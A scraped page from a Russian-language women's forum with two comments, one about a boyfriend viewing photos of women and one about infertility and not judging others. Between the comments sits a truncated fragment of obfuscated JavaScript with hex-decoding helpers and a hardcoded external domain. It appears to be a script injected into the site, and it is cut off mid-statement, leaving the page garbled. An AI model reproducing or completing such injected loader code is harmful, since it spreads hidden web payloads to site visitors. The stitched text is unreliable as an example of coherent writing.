И прочитала Ваш коммент про то, что парень скачал и рассматривает фото женщин. Понимаю, обидно и неприятно, НО он просто смотрит картинки. Он также и с таким же интересом мог смотреть фото машин. Не надо заострять на этом такое внимание. А лучше , чтобы изменял и вживую смотрел? Не бывает идеальных мужчин, все они время от времени смотрят порно, развлекаются сами с собой, просто не все были за этим замечены, и только наивные женщины думают, что их мужики так не делают. Будьте умнее, пошутите на этот счет, да забудьте, не стоит себе мотать нервы по такому пустяковому поводу.

Ответить
Поддерживаю Да0 / Нет0
Сила женщины - в ее слабости!
шоколадочка
18143 шоколадочка
шоколадочка offline
Репутация : 124412
Комментариев 1119 17
30 мая 20:19:17
2016-05-30 20:19:17

леночкин, Спасибо большое Вам!!!!!!!!!!!! Насчет того, что не получается забеременеть - уже вообще успокоилась и смирилась, честно говоря. В моем восприятии сейчас беременность и дети вообще представляются какой-то фантастикой. Видимо, пока еще не заслужила быть матерью . У меня два взрослых двоюродных брата и сестра. Так же ни у кого нет детей. А еще у одной двоюродной сестры - ребенок вымоленный слезами у Бога. Как они его ждали!!!!! Слезы на глазах!!!!!!!! Про алкашей - правильно Вы сказали, про то что они не перестали быть людьми, Видимо, именно они в первую очередь заслужили право быть родителями. И я не имею права о них так говорить и осуждать.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке